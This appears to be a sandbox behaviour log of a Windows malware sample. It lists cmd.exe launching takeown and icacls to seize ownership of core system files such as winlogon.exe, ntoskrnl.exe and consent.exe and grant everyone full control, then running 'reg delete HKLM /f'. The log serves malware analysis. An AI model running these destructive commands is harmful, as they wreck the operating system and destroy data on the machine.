Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\takeown.exe takeown /f C:\Windows\System32\winlogon.exe /r /d y
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\icacls.exe icacls C:\Windows\System32\winlogon.exe /grant everyone:F /t
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\takeown.exe takeown /f C:\Windows\System32\wininit.exe /r /d y
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\icacls.exe icacls C:\Windows\System32\wininit.exe /grant everyone:F /t
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\takeown.exe takeown /f C:\Windows\System32\ntoskrnl.exe /r /d y
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\icacls.exe icacls C:\Windows\System32\ntoskrnl.exe /grant everyone:F /t
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\takeown.exe takeown /f C:\Windows\System32\regedit.exe /r /d y
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\icacls.exe icacls C:\Windows\System32\regedit.exe /grant everyone:F /t
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\takeown.exe takeown /f C:\Windows\System32\taskmgr.exe /r /d y
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\icacls.exe icacls C:\Windows\System32\winlogon.exe /grant everyone:F /t
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\takeown.exe takeown /f C:\Windows\System32\consent.exe /r /d y
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\icacls.exe icacls C:\Windows\System32\consent.exe /grant everyone:F /t
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\takeown.exe takeown /f C:\Windows\System32\wininit.exe /r /d y
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\icacls.exe icacls C:\Windows\System32\drivers /grant everyone:F /t
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg delete HKLM /f
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
No contacted IP infos